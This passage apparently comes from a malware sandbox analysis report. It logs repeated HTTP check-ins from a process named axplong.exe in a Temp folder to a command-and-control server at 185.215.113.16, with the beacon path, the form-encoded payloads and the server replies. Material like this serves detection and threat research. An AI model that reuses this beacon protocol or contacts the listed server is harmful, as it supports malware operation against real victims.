                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:36.362466097 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:36 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    32192.168.2.656659185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:36.481770039 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:37.171601057 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:37 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:37.172561884 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:37.395509005 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:37 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    33192.168.2.656660185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:37.511740923 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:38.221683979 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:38 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:38.222667933 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:38.452107906 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:38 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    34192.168.2.656661185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:38.572932959 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:39.263139009 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:39 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:39.263951063 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:39.486418009 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:39 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    35192.168.2.656662185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:39.604418993 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:40.303152084 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:40 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:40.304280043 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:40.732359886 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:40 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    36192.168.2.656663185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:40.855696917 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:41.570380926 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:41 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:41.571145058 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:41.803040028 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:41 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    37192.168.2.656664185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:41.919622898 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:42.649111986 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:42 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:42.650000095 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:42.886360884 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:42 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    38192.168.2.656665185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:42.995091915 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:43.693146944 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:43 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:43.694160938 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:43.918688059 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:43 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    39192.168.2.656666185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:44.028135061 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:44.734633923 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:44 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:44.735745907 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:44.968997955 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:44 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    40192.168.2.656667185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:45.091398001 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:45.783442020 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:45 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:45.784451008 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:46.007337093 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:45 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    41192.168.2.656668185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:46.119908094 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:46.813469887 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:46 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:46.814649105 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:47.043282032 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:46 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    42192.168.2.656669185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:47.152138948 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:47.854932070 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:47 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:47.856631994 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:48.087030888 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:47 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    43192.168.2.656670185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:48.416569948 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:49.115117073 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:49 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:49.115890026 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
